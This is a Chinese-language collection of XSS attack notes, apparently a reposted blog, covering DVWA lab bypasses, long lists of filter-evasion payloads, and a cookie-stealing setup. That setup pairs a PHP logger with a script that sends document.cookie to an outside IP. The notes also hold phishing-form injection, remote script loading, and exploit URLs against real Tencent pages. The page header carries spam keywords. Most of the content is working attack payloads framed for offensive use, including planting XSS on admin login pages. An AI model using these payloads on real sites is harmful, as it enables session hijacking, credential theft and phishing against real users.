3atv精品不卡视频,97人人超碰国产精品最新,中文字幕av一区二区三区人妻少妇,久久久精品波多野结衣,日韩一区二区三区精品

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

xss专用章节

發(fā)布時間:2025/7/14 编程问答 13 豆豆
生活随笔 收集整理的這篇文章主要介紹了 xss专用章节 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

?

?

?

?

XSS 轉(zhuǎn)碼 ?

XSS小助手

http://web.chacuo.net/charsetjsascii??

js轉(zhuǎn)unicode

?

?

http://tool.chinaz.com/Tools/native_ascii.aspx

ascii/native 編碼互轉(zhuǎn)

?

?

?

http://zone.secevery.com/code/

xss編碼轉(zhuǎn)換(最全)

?

?

https://www.toolmao.com/xsstranser

Xss string.fromCharCode 轉(zhuǎn)換

?

?

怎么去挖掘XSS漏洞

比如說,有一個站點有搜索框,我們?nèi)ゲ檎?/span>

?

然后去查看源代碼,看它對<>”?有沒有過來,如果有,就想辦法去繞過,如果沒有,就直接構(gòu)造XSS漏洞

?

?

?

?

javascript 事件和協(xié)議

  • onclick ,當(dāng)鼠標(biāo)點擊一下時執(zhí)行一次
  • onmouseover ,當(dāng)鼠標(biāo)放上去時執(zhí)行一次
  • onmouseout ,當(dāng)鼠標(biāo)移出去時執(zhí)行一次
  • onmousedown ,當(dāng)鼠標(biāo)按下時執(zhí)行一次
  • onmouseup ,當(dāng)鼠標(biāo)在上面松開(彈起)時執(zhí)行一次
  • onmousedblclick ,當(dāng)鼠標(biāo)雙擊時執(zhí)行一次
  • onload ,當(dāng)對象加載完成時執(zhí)行

什么是偽協(xié)議

偽協(xié)議不同于因特網(wǎng)上所真實存在的協(xié)議,如http://,https://,ftp://,

而是為關(guān)聯(lián)應(yīng)用程序而使用的.如:tencent://(關(guān)聯(lián)QQ),data:(用base64編碼來在瀏覽器端輸出二進(jìn)制文件),還有就是javascript:

我們可以在瀏覽地址欄里輸入"javascript:alert('JS!');",點轉(zhuǎn)到后會發(fā)現(xiàn),實際上是把javascript:后面的代碼當(dāng)JavaScript來執(zhí)行,并將結(jié)果值返回給當(dāng)前頁面。

?

類似,我們可以在a標(biāo)簽的href屬性中使用javascript偽協(xié)議

?

?

?

<a href="javascript:alert('JS!');"></a>

//點擊這面的鏈接,瀏覽器并不會跳轉(zhuǎn)到任何頁面,而是顯示一個彈窗

javascript:偽協(xié)議有個問題,它會將執(zhí)行結(jié)果返回給當(dāng)然的頁面

<a href="javascript:window.prompt('輸入內(nèi)容將替換當(dāng)前頁面!','');">A</a>

?

?

?

?

?

?

Xss

?

xss漏洞發(fā)生在web前端,主要對網(wǎng)站用戶造成危害

?

反射型 XSS

通過xss 漏洞改造帶有攻擊腳本的URL ,發(fā)送URL給目標(biāo),觸發(fā)惡意腳本,一次性,所見即所得,一般出現(xiàn)在查詢類頁面

?

?

存儲型XSS

通過XSS漏洞將帶惡意腳本注入到服務(wù)器后臺(數(shù)據(jù)庫或者文件中 ),訪問該頁面觸發(fā)惡意腳本,永久性一般出現(xiàn)在留言板等

打開火狐,進(jìn)入dvwa,級別調(diào)成低級別

?

XSS(reflected) 選項里做實驗

?

?

?

在文本框輸入 JS代碼

?

<script>alert("xss")</script>

?

?

?

?

?

?

彈出了XSS ,證明這個文本框有反射XSS

?

?

打開火狐,進(jìn)入dvwa,級別調(diào)成中級別

?

這時候再用

<script>alert("xss")</script>

?提交,發(fā)現(xiàn) ?????????

?

?

并沒有彈窗 猜測可能過濾的 script 腳本,但是沒有過濾HTML腳本

?

?

?

?

可以輸入 ????<scr<script>ipt> alert("kk")</script>

?

?彈窗了,成功繞過了

?

打開火狐,進(jìn)入dvwa,級別調(diào)成高級別

?

?

這是 輸入 ??<scr<script>ipt> alert("kk")</script> ?不行了

返回了一個這個

?

?

現(xiàn)在去查看他的源代碼

?

?

?

最后輸入的是 pre 這個標(biāo)簽,想辦法取消掉他

?

?

?

???使用這個語法來取消掉

????11</pre> <img src=1 ?οnerrοr=alert('xss')> <pre> 22

?

??

對文本框輸入, 反射XSS就彈出來了

?

?

?

?

證明有XSS漏洞后可以

?11</pre> <img src=http://自己帶有XSSpayload的網(wǎng)址> <pre> 22

?

?

?

各個級別的代碼 剖析

?

最低級別 low

<?php

?

// Is there any input?

if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {

????// Feedback for end user

????echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';

}

?

?> ??

?

沒有對輸入做任何的過濾,只是判斷他是否存在

?

?

?

中級別的 ?medium

?

????<?php

?

// Is there any input?

if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {

????// Get input

????$name = str_replace( '<script>', '', $_GET[ 'name' ] );

?

????// Feedback for end user

????echo "<pre>Hello ${name}</pre>";

}

?>

?

判斷他是否存在,并且使用了 str_replace 將輸入的結(jié)果中的 ?<script> 給替換成空,但是僅僅對含有 <script> ?的腳本有限制 可以用 <scr<script>ipt> alert("kk")</script> ?來繞過

?

?

?

?

?

?

?

?

高級別的 ?high

?

?

?<?php

?

// Is there any input?

if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {

????// Get input

????$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

?

????// Feedback for end user

????echo "<pre>Hello ${name}</pre>";

}

?

?>

?

?

執(zhí)行了正則的搜索,一旦匹配就干掉, 但是還是只是在 script 這個字符中下了功夫,,但是可以用別的語法來做xss

?

例如: ???11</pre> <img src=1 ?οnerrοr=alert('xss')> <pre> 22

?

?

?

?

?

?

?

?

?

?

?

?

接下來介紹DOM 類型的xss

?

Dom 型xss 演示和分析 ?在服務(wù)器上對這段代碼測試

?

??<script>

?????function test(){

????? var str=document.getElementById('text').value;

????? document.getElementById('t').innerHTML="<a href=' "+str+"'> testLink</a> ";

?

?????}

?????

?????</script>

?

????<div id="t"></div>

????<input type="text" id="text" value="">

????<input type="button" id="s" value="write" οnclick="test()">

?

?

?

然后輸入 'οnclick=alert("xss") //???????

再去點擊,就會反射個xss

?

?

?不過引號可能會被過濾什么的,最好輸入

'οnclick=alert(/xss/) //

?

?

?

?

?

反射出來的 多加了個 //

?

?

解釋:首先用第一個單引號閉合掉 href 的第一個單引號,然后插入一個onclick 事件,最后再用注釋符 // ?注釋掉第二個單引號

?

?

還可以用另外一種方法

?

'> <img src=# οnerrοr=alert("xss2") /> <'

?

點擊確定

?

頁面的代碼就變成了

???<a href=''> <img src=# οnerrοr=alert(/xss2/) /> ?<'' > ??testLink </a>

?

?

?

?

?

?

?

?

?

現(xiàn)在切換到DVWA,設(shè)置成LOW 低級別 -切換到XSS (stored ) ?帶有XSS漏洞的留言板

?

<script>alert("xss")</script> 復(fù)制到留言板

?

?

?

?

可以看到,這里在最長這里設(shè)置了10個字符

?

右擊->編輯HTML

?

?

?

?

?

?

?然后提交

?

反射XSS就出來了,

?

?

存儲型XSS漏洞

?

PHP 中stripslashes函數(shù)表示:去除字符串中的反斜線字符,如果有兩個連續(xù)的反斜線,則只去掉一個;

?

?

現(xiàn)在把DVWA切換到中 級別 ??中級別的 ?medium

還是原來的樣子,繞過前端對字符的限制

輸入 <script>alert("xss")</script>

會發(fā)現(xiàn),并沒有彈窗,而是

腳本過濾了,但是過濾不嚴(yán)格

?

?

可以用 <scr<script>ipt> alert("xss11111")</script> ?來繞過

高級別對script 便簽做了完美的限制,但是對腳本沒有做限制,還是可以繞過

<img src=1 ?οnerrοr=alert('xssend')>

?

還是彈窗了

?

?

?

?

?

?

?

?

?

實驗: 通過xss 盜取用戶的cookie

?

?

?

?

?

?

?

?

?

接收端寫的代碼

?

?

?

<?php

?

$cookie=$_GET['cookie']; ?//已get方式提交獲取cookie

?

$time=date('Y-m-d g:i:s '); ??// 已 "年-月-日 分:秒 顯示格式"

?

$referer=getenv('HTTP_REFERER'); ??//獲取referer

?

$cookietxt=fopen("cookiee.txt", "a+"); ??//創(chuàng)建并且cookie

?

fwrite($cookietxt, "time:".$time." cookie:".$cookie." referer:".$referer."\r\n"); //寫入到文件

?

fclose($cookietxt);

?

?

?

?

?

?>

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

腳本端

?

<script>document.write('<img src="http://192.168.1.61/xss/index.php?cookie='+document.cookie+'" width=0 height=0 border=0 />')</script>

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

先測試下, 192.168.1.61站點是否能接受cookie

?

192.168.1.61/xss/index.php?cookie=dwadaw

?

?

然后在 192.168.1.61 的web目錄上就生成了一個cookie

?

?

?

?

?

?

現(xiàn)在確認(rèn)接收站點正常

?

?

?

?

進(jìn)入 dvwa 把級別調(diào)至低級別 LOW

?

對著輸入框->右擊firebug ->

?

?

?

?

繞過前端的字符限制

?

xss 存儲型的代碼放上去

?

?

?

?

?

提交

?

?

然后 只要別的用戶再去瀏覽這個 留言板,他們的cookie 就會被自動盜取

?

自己模擬一個用戶去登錄

。。。。。。

?

?

?

?

?

然后進(jìn)入 接收站點查看cookie

?

?

打開火狐

?

使用火狐的firebug

?

?

?

?新建cookie

?

?

?

把剛剛劫持到的cookie 放到這里

確認(rèn)

?

然后把cookie 后面的網(wǎng)址也復(fù)制下來

?

?

?

?

?

?

?

?

對著火狐地址框輸入 進(jìn)去,如果直接進(jìn)去了,就證明成功了

?

?

?

?

?

?

?

?

?

?

直接進(jìn)來了

?

?

?

?

如果以下不能彈窗,可能是瀏覽器版本的問題

?

彈出XSS的方法有很多種

1 利用HTML標(biāo)簽

2 利用HTML標(biāo)簽的屬性值來做

例子:

?<img src=1 οnerrοr="alert(/xss/)">

<input type="text" value="烏云歡迎您" ?οnclick="alert(/xss/)" />

3 ?空格回車TAB

如果XSS 過濾僅僅把敏感的輸入字符列入黑名單,如銘感字 javascript 而言,用戶可以利用空格,回車和TAB繞過限制

?

例如

<img src=”java ???script:alert(/xx/)”??widht=100>

注入,java 和script 之間的間隔不是空格鍵,而是TAB鍵添加的,把以上的代碼保存在HTML中,用IE6打開。此時IE 6會彈窗 ,但是在我自己測試的時候沒有彈窗,記住這個思路就好了

?

Var ?a=true

Var b=”im 2cto-bnsky”

如果同一行中有多個語句,那么每個語句就必須 使用分號來來結(jié)束

Var ?a=true;b=”im 2cto-bnsky”

?

除了再引號中分割單詞或強制結(jié)束語句之外,額外的空白無論已何種方式添加無所謂,下面的代碼,雖然語句中有一個換行符,但變量的賦值完全成功

?

var ?a=”hello word”;

alert(a);

?

引擎沒有把換行符解釋為語句的終止符,因為到換行符并不是一個完整的語句,JavaScript會繼續(xù)處理發(fā)現(xiàn)的內(nèi)容,直到遇到一個分號或發(fā)現(xiàn)語句完整為止, 因此用戶可以構(gòu)造下面的代碼形式繞過系統(tǒng)對javascript 等關(guān)鍵字的過濾

??<iMg srC=1 ;

???ONerror="alert(/1/)">

使用回車符分割關(guān)鍵字(拆分關(guān)鍵字)的技巧,還有大小寫,成功執(zhí)行了跨站腳本代碼

?

4 ?對標(biāo)簽屬性值轉(zhuǎn)碼

此外,對普通HTML標(biāo)記的屬性值進(jìn)行過濾,用戶還可以通過編碼處理來繞過,因為HTML中屬性值本身支持ASCII碼形式

?

<img src=”javascript:alert(‘xss’);”> ?????????//這條語句自己測試的時候是不行的

替換為

?

?<img src="javascriptt:alert(/xss/)" >

?

?

源代碼是<img src=1 οnerrοr="alert(/s/)"> 經(jīng)過轉(zhuǎn)換為

?<ImG src=1;

?????onerRoR=alert(/s/)

?>

?

5 ?產(chǎn)生自己的事件

現(xiàn)在,假設(shè)用戶不能一開屬性值進(jìn)行跨站,

?

??<input type="button" value="click me " οnclick="alert(YES)">

這是HTML代碼中的事件處理程序,運行這段代碼,點擊就觸發(fā)彈窗

我們把事件分為3個不同的類別

用戶接口(鼠標(biāo),鍵盤)

邏輯(處理的結(jié)果)

變化(對文檔進(jìn)行的修改)

既然事件能讓javascript代碼運行,就意味著用戶也能利用它執(zhí)行跨站腳本

?<img src=1 ?οnerrοr="alert(/xss/)">

測試事件腳本還有很多,

Onmouseover

...

...

..

?

?

?

?

?

?

6 ?利用CSS跨站剖析

?

例子

<div style="background-image: url("javascript:alert('xss')")"></div> ??//這個自己嘗試了不行

?

IE5 以及其后的版本在支持CSS中使用expression,使用Experssion 同樣可以觸發(fā) XSS漏洞

?<div style="width: expression(alert('sssss'));"></div> //這條可以

?<div style="color: expression(alert('XSS'))">

?這樣也可以

?<div style="w: expression(alert('sssss'));"></div>

?

?

IE 7 。IE6 可以彈窗

?

?

??一個正常的xss 輸入

?????<img src=1 οnerrοr="alert(1)" >

?

大小寫混合

?<IMG SRC=1 οnerrοr="alert(1)" >

單引號xss

?<iMg ?SRC=1 οnerrοr= 'alert(1)' >

沒有引號的XSS

?<IMG SRC=1 οnerrοr= alert(1)>

?

沒有空格的XSS

??

?<IMG/SRC=1 οnerrοr=alert(1)>

這里的IMG標(biāo)記和SRC熟悉沒有空格,而是用/隔開,依然可以彈窗

?

?

?

<a href="java script:alert(/xss/)">xss</a>

a和s 之間用tab鍵去繞過

?

?

?

???當(dāng)利用expression執(zhí)行跨站時,可以構(gòu)造不同的全角字符來擾亂過濾規(guī)則:

?

???<XSS STYLE="xss:expEssion(alert('xss'))">

???<div style="{left:expression(alert('xss'));}"></div>  //這個是正確的XSS代碼,上面意思是擾亂過濾規(guī)則

?

?

??<div style="wid/******/th: expr/**javascript***/ession(alert('xss'))"></div>]

利用 ?/***/ s各種去繞過過濾規(guī)則

?

??樣式中的 /**/ 會被瀏覽器忽略,因此可以運用/**/ 來注釋字符,通過插入混淆字符繞過過濾

?????<XSS STYLE="xss:expr/*xss*/ession(alert('xss'))"> ????//擾亂對方的過濾規(guī)則

?????<div style="wid/*******/th:expre/*xss*/ssion(alert('xss'))">123123</div> ??//xss 彈窗 ?在IE5,IE7 有效

?

?

Expression 在IE 里有效,其實就是javascript 的意思

?

如果對方過了了Script 可以嘗試

<scr<script>ipt>alert("XSS")</scr<script>ipt>

?

?

?

?<a href=javascript:alert(/xss/)>123321</a> ?不用引號的XSS

?

?

?

<iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

?

?

??<isindex action=j a vas c r ipt:alert(1) type=image>

?

?

?

base64編碼

Data協(xié)議使用方法? ?data:資源類型;編碼,內(nèi)容

到目前為止 我遇到使用base64編碼的情況 大多數(shù)是這樣

<a href="可控點">

<iframe src="可控點">

在這種情況下 如果過濾了<> ' " javascript 的話 那么要xss可以這樣寫 然后利用base64編碼!

?

<a href="<script>alert(/sss/)</script>">222222222</a> //源代碼,這樣是不能彈窗的

?

?<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=">adwada</a> ?//加上base64 編碼就能彈窗 ???data:text/html;base64,是固定語法

?

?

?

HTML5 新增的實體命名編碼,如

: => [冒號]? ???=> [換行

?

<a href="javascript:alert(1)">click</a>

?

解析器一般將工作分配給兩個組件——詞法分析器(有時也叫分詞器)負(fù)責(zé)將輸入分解為合法的符號,解析器則根據(jù)語言的語法規(guī)則分析文檔結(jié)構(gòu),從而構(gòu)建解析樹,詞法分析器知道怎么跳過空白和換行之類的無關(guān)字符。

<a href="javascript:alert(1)">click</a>

首先html編碼被還原出來 然后就成了換行 跟冒號

<a href="javasc

ript:alert(1)">click</a>??

為什么換行后還能夠執(zhí)行?是因為瀏覽器中的解析器中詞法分析器?起的作用會跳過空白跟換行之類的無效字符。換行時必須用單雙號圍住,否則不會跳過。跳過回車和換行,不支持on事件.

然后就構(gòu)造成了一個完整的語句

<a href="javascript:alert(1)">click</a> 代碼成功執(zhí)行

?

?

?

?

?

?

?

?

?

字符編碼:

字符編碼在跨站腳本中經(jīng)常運用到,透過這種技巧,不僅能讓XSS代碼繞過服務(wù)端的過濾,還能更好的隱藏shellcode

?

?

繞過 magic_quotes_gpc

這個是 PHP里的一個安全參數(shù)

Magic_quotes_gpc=ON ?是php中的安全設(shè)置,開啟后會把一些特殊字符進(jìn)行輪換,比如 ‘(單引號) ?轉(zhuǎn)換為 ??\' ????"(雙引號) 轉(zhuǎn)換為 ??\" ?????????\轉(zhuǎn)換為 \\

?

?比如 ?<script> alert("xss") </script> 會轉(zhuǎn)換成 <script>alert(\"xss\");</script> 這樣的話我們的XSS就不生效了

?

?

?針對開啟了magic_quotes_gpc 的網(wǎng)站,我們可以通過javascript 中的String.fromCharCode方法來繞過,我們可以把 alert("xss") 轉(zhuǎn)化為

??String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41) 那么我們的XSS語句就變成了

<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)</script>

String.fromCharCode()是javascript中的字符串方法,用來把ASCII轉(zhuǎn)換為字符串。

?

?

可以嘗試把XSS留在管理員登錄界面,這樣的話就可以永久劫持它的cookie

?

?繞過長度限制

?<input type="text" value="$var">

?如果服務(wù)器端v在變量 $var 上做了長度限制的話,那么攻擊者可能會構(gòu)造這樣的XSS

?

?$var 為 ?"> <script>alert(/xss/)</script>

??????希望達(dá)到的輸出效果是:

???????<input type="text" value=""><script>alert(/xss/)</script> "

???????假設(shè)字符長度限制為20個字節(jié),攻擊就無法完成,那么可以利用事件

???????"οnclick=alert(1)??//

?

效果就是 <input type="text" value="" οnclick="alert(/xss/) ?">

?

?

?

?

挖洞專用彈窗代碼

?

?

script>window.setAttribute('onload',alert('xss')</script>

?

onerror ?十六進(jìn)制的HTML為

onerror

?

<img src=1 οnerrοr=alert(1);> ??不要引號也能彈窗

?

<a href="javascript:alert('xss')">2</a> 點擊彈窗

?

?

?<video src=x ?????οnerrοr=prompt(1);> ?彈窗

?

?

?<div οnclick="alert('ss')">12321 </div> ???彈窗

不需要 <> / ??的彈窗

<script>

eval(`alert(1)`);

</script>

或者

<script>

window.alert("xss")

</script>

?

?

<object data="javascript:alert(1)">

?

<SvG/onlOad=alert(1)> ???//最短的一個彈窗

?

?

???<iframe/οnlοad=alert(1)>彈窗

?

?

??<body/οnpageshοw=alert(1)> ??彈窗

?

?

?<? echo('<scr'); echo('ipt>alert(/ss/)</script>');?> 彈窗

?

?

?

<marquee><script>alert(`ss`)</script></marquee> 彈窗

?

?

?

<script>var test=1;alert(test)</script> 彈窗

?

?

?

?

?eval("\x61\x6c\x65\x72\x74\x28\x27\x58\x53\x27\x29") ?????彈窗 ???16進(jìn)制轉(zhuǎn)碼

?

???

??????eval(alert('ss')) ??????//原始代碼

??????eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0060\u0073\u0073\u0060\u0029") ?//轉(zhuǎn)換后 ?轉(zhuǎn)換后必須加上雙引號

?

?

?

?

??在某些特定的環(huán)境下,可以利用注釋繞過 長度限制

??<input type="text" id="1" value="">

??<input type="text" id="2" value="">

??在第一個 input 框輸入

????"><!--

????在第二個input框輸入

--> <script>alert(/xss/)</script>

?

?

??最終的效果是

??<input type="text" id="1" value=""> ?<! -- ?" />

???xxxxxxxxxx

??<input type="text" id="2" value=""> --> <script>alert(/xss/)</script>

?

中間的代碼全部被 ??<!--- ?-->

?

?

?

?

?

?

?

?

?

?

?

?

var search = "可控點";

document.getElementById().innerHTML=search;

以上情況很多都是出現(xiàn)在你搜索后 然后顯示的 你所查詢的關(guān)鍵字

如果過濾了 <> ' " & % 等等這些!然后再輸出到頁面上!

按理說這樣是安全了!但是我們把輸入的值改成 js編碼,

我們改成 <img src=x οnerrοr=alert(1)> 然后進(jìn)行js八進(jìn)制編碼 ==>

\74\151\155\147\40\163\162\143\75\170\40\157\156\145\162\162\157\162\75\141\154\145\162\164\50\61\51\76

然后服務(wù)器端接受后 經(jīng)過過濾器 沒有發(fā)現(xiàn)該過濾的就進(jìn)入到了innerHTML中

經(jīng)過js的解碼 我們的代碼又還原回來了 并且注入到了網(wǎng)頁中!這時候代碼執(zhí)行!成功彈窗!

?

?

?

URL編碼

Javascript:偽協(xié)議后面可以使用URL編碼。

:<a href="javascript:%61lert(1)">click me</a>可成功執(zhí)行彈窗

可用img就不行:<img src=1 οnerrοr=”javascript:%61lert(1)”>

因為href屬性會跳轉(zhuǎn)到其中的URL,而會進(jìn)行URL解碼.onerror屬性則只會執(zhí)行JS,不跳轉(zhuǎn)

同時后面的url編碼可以再做一次entity(HTML實體)編碼:

<a href="javascript:%61lert(1)">click me</a>

由于entity編碼允許&#之后插入任意多個0,再利用上javascript的注釋混淆后:

<a href="javascript: //%0a %61lert(1)">click me</a>

?

?

?

?

?

?

繞過防御

過濾了alert(1)的括號,可以用alert`1`??//反引號

利用js字符串模塊??eval.call`${'\141\154\145\162\164\50\61\51'}`

轉(zhuǎn)換大小寫<scRiPt>alert(1)<ScRipt>

繞過Php的htmlspecialchars()

Php的htmlspecialchars()默認(rèn)能將< > & “轉(zhuǎn)成< > & "

如果用了htmlspecialchars($name, ENT_QUOTES);? ?則 ’ 也會被轉(zhuǎn)成 '

如果用了 htmlspecialchars ($name, ENT_NOQUOTES);則單雙引號都不會被轉(zhuǎn)換。

Js中可用以下代碼繞過

Javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))

Html中可用以下代碼繞過:

‘ οnmοuseοver=’alert(1)

源代碼是<input type=”text” value=””>

變成了<input type=”text” value=” ‘οnmοuseοver=’alert(1)”>

這個沒試過,不知道行不行~~~

?

?

?

單引號或者是 ~鍵盤上的反引號 ?你都試試

?

?

?

2.php源代碼

<?php

$name = $_GET["name"];

$name = htmlspecialchars($name);

?>

<input type='text' value='<?php echo $name?>'>

地址欄輸入http://127.0.0.1/2.php?name=’ οnmοuseοver=’alert(1)后回車

然后將鼠標(biāo)移到那個框框后, 彈出彈窗.

我自己試了 ,沒彈窗

?

?

Xss釣魚(掛馬):

(1)xss重定向釣魚

如自己建一個釣魚網(wǎng)站www.xiumu.com, 然后受害者訪問如下地址http://www.test.com/a.php?id=””><script>document.location.href=”http://www.xiumu.com”</script>

或者http://www.test.com/a.php?id=””><iframe src=”http://www.xiumu.com” height=0 width=0 ></iframe>

?

?

?

(2)HTML注入式釣魚

直接利用XSS漏洞注射HTML/js 代碼到頁面中.可寫一個正常的HTML表單來竊取賬號密碼.如:http://www.test.com/a.php?id=””<html><head><title>login</title></head><body><div style=”text-align:center;”><form method=”POST” action=”xiumu.php” name=”form”><br/><p>username</p><input type=”text” value=”” name=”a”><p>password</p><input type=”password” name=”b” value=””><br/><input type=”submit” value=”login”></form></body></html>

這樣當(dāng)用戶直接填入賬號密碼提交后,你就可以在xiumu.php接收到受害者的賬號密碼了.

Xiumu.php代碼:<?php echo $_POST[‘a(chǎn)’]?><?php echo $_POST[‘b’]?>

(3)Xss跨框架釣魚

這種方式是通過<iframe>嵌入遠(yuǎn)程域的一個頁面實施釣魚,http://www.test.com/a.php?id=””><iframe src=”http://www.xiumu.com” height=”100%” width=”100%”></iframe>通過將www.xiumu.com的頁面做的和test的頁面相同(可利用iframe實現(xiàn)),但受害者看到的不是真正的test頁面,而是xiumu頁面.

?

?

?

騰訊微博曾經(jīng)的XSS漏洞

?

<a href="###" οnclick="setTimeout(function(){ UI.remove($('upload_pic_container')) }, 10); MI.talk('分享活動','#x');alert(document.cookie);//#這個活動【xx】挺好玩,大家快來參加吧,地址是http://event.t.qq.com/x', 80, null, function(){window.location.reload()} );">分享</a><span>|

?

?

?

由于瀏覽器解析頁面的時候會先把'解碼成',從而在onclick的javascript環(huán)境下形成單引號閉合,從而當(dāng)點擊“分享”即可觸發(fā)我們插入的代碼。

?

?

?

?

IE6-IE8,IE9的兼容模式有效的xss,插入如下的代碼,當(dāng)鼠標(biāo)點擊test即觸發(fā)xss。

?

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">test</a>

?

貌似只能是a標(biāo)簽有效

?

?

Xss 的基本概念

  • XSS的存在,一定是伴隨著輸入,與輸出2個概念的。
  • 要想過濾掉XSS,你可以在輸入層面過濾,也可以在輸出層面過濾。
  • 如果輸入和輸出都沒過濾。 那么漏洞將是顯而易見的
  • 作為第一個最基礎(chǔ)的例子, 我們拿出的是一個什么都沒過濾(其實還是有些轉(zhuǎn)義的,主要沒過濾< , >)的例子。 這種例子出現(xiàn)在騰訊這種大網(wǎng)站的概率不是很高。 但是還是讓我找到了一個。
  • http://app.data.qq.com/?umod=commentsoutlet&act=count&siteid=3&libid=9&dataid=1480&score=1&func=haoping&_=1353475261886
  • 對于上面這個例子。我們可以看到什么是輸入,什么是輸出
  • . 經(jīng)過測試,我們發(fā)現(xiàn),score這個【輸入】參數(shù),沒有進(jìn)行任何過濾,

    即,輸入是什么,輸出就是什么? 通俗點就是“吃什么,拉什么”。。

    如下圖

  • ?

  • ?

    ?

    ?

    ?

    ?

    ?

  • 既然可以直接輸入 < > HTML標(biāo)簽,接下來的利用也就相對簡單了。
  • ?

    ?

    http://app.data.qq.com/?umod=commentsoutlet&act=count&siteid=3&libid=9&dataid=1480&score=<img src=1 οnerrοr=alert(1);>&func=haoping&_=1353475261886

    ?

    ?

    ?

    eval() 也可以執(zhí)行10進(jìn)制形式的文本,但是需要配合String.fromCharCode 函數(shù)的使用

    string.fromcharcode()用于將字符轉(zhuǎn)化為ascii值

    ?

    ?

    例子

    <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ???<a href="javascript:alert(/sss/)">sss</a> ??????//原始代碼。利用偽造協(xié)議

    ?

    ?????10進(jìn)制編碼以后 ?????

    ?

    ?

    ???????????<a href="javascript:alert(/sss/)">sss</a>

    彈窗

    ?

    ?

    ?

    ?動態(tài)調(diào)用遠(yuǎn)程javascript

    ?假設(shè)www.bug.com 的某個頁面存在一個含有XSS漏洞 exploit 如下

    ?

    ?http://www.bug.com/veiw.php?sort=[exploit]

    ?

    ?????可以直接把shellcode 寫到URL參數(shù)中

    ??????http://www.bug.com/veiw.php?sort=<script>alert(/xss/)</script>

    ?

    ?????因為種種限制,所以只需寫一個script標(biāo)簽引用自己的惡意站點進(jìn)行動態(tài)的加載,這樣的話我們可以在我們的站點寫上任意代碼然后被漏洞站點加載

    ?

    ?

    ?

    ?除了使用 <script>標(biāo)簽動態(tài)的調(diào)用遠(yuǎn)程javascript ,還可以運用基于DOM的方法創(chuàng)建和插入節(jié)點,把腳本注入到HTML網(wǎng)頁里

    ?

    ?

    ?<script>

    ?? var s=document.createELement("script");

    ?? s.src="http://www.baidu.com/1.js";

    ?? document.getElementsByTagName('head')[0].appendChild(s)

    ??</script>

    ?

    ?

    ?

    location.hash 用法

    ??#alert('xss')" >http://www.bug.comv/vriw.php?sort="><script>eval(location.hash.substr(1))</script>#alert('xss')

    ?

    ?

    ?

    substr() 可在字符串中抽取從start下標(biāo)(這里是1)開始的制定數(shù)目的字符,所以location.hash.substr(1) 的作用是抽取 ?“#”?符號后面的字符,即 alert(‘xss’) 而 eval() 函數(shù)用來計算某字符串,并執(zhí)行其中的javascript 代碼,通過這種技巧,就能先把shellcode 寫到地址參數(shù)再執(zhí)行,

    ?

    ?

    ?

    ?

    ?

    一段XSS的payload

    某網(wǎng)站同學(xué)留言的貼圖URL輸入框出現(xiàn)過XSS,主要是onload 事件來觸發(fā)

    在留言的貼圖URL的輸出框里填寫

    editor/uploadfile/2016/2/123123123.gig" οnlοad="var t=document.body.innerHTML;var s=t.indexOf('+++')+3;var e=t.indexOf('---)eval(unescape(t.substring(s,e)))">

    ?

    在留言框內(nèi)容填寫

    ?

    xss代碼觸發(fā)以后,會調(diào)用留言內(nèi)容中的+++和---之間部分代碼,對這段代碼解碼后得到核心的shellcode如下

    ?

    ?

    ?try{

    ? var as=document.getElementsByTagName('a'); ??

    ? var frm=document.getElementsByTagName('iframe')[0];

    ? frm.οnlοad=function(){

    ? var oFrm=document.getElementsByTagName('iframe')[0]; ??

    ? oFrm.οnlοad="";

    ? var oDoc=oFrm.contentWindow.document;

    ? oDoc.all["who"][1].checked=true;

    ? oDoc.dealmember.action="backation/updateclassmate.jsp?f=1";

    ? oDoc.dealmember.submit();

    ?

    ? }

    ? frm.src=as[34].href

    ?}catch(e){

    ? alert(e)

    ?}

    ????????

    ????????大概意思就是 獲取所有的a標(biāo)簽 獲取第一個iframe,定義一個加載的函數(shù),獲取第一個iframe標(biāo)簽,設(shè)置它的參數(shù),提交到backation/updateclassmate.jsp?f=1這個網(wǎng)頁中,自動提交, iframe 的內(nèi)容也就是src 和頁面上的某個a標(biāo)簽的src 是一樣的,就等于是新建了一個iframe框架,里面的內(nèi)容就是頁面上的a標(biāo)簽的內(nèi)容,并且自動提交。就是頁面跳轉(zhuǎn)劫持的意思

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    cookie 常見屬性

    Domain-設(shè)置關(guān)聯(lián)cookie 的域名

    Expires-通過給定一個過期時間來創(chuàng)建一個持久化cookie

    httponly-用于避免cookie被javascript訪問

    name-cookie 的名稱

    path-關(guān)聯(lián)到cookie的路徑,默認(rèn)為/

    value- 讀寫cookie 的值

    secure- 用于指定cookie需要通過安全socket層連接傳遞

    ?

    ?

    ?

    創(chuàng)建cookie,需要提供cookie 的名字,對應(yīng)值,過期時間和相關(guān)路徑

    php設(shè)置

    <?

    setcookie(‘user_id’,123) ??//創(chuàng)建一個cookie變量user_id=123

    ?>

    ?

    刪除cookie

    setcookie(‘user_id’,0,time()-1)

    ?

    在瀏覽器輸出

    javascript:alert(document.cookie) ?就能知道cookie

    ?

    攻擊者可以通過以下幾種方式獲取cookie

    ?

    ?

    ?

    ?

    ?

    自己寫一個請求添加賬號密碼的XSS ?shellcode, 關(guān)于ajax 如果忘了,可以去看前端的筆記.dox

    ?
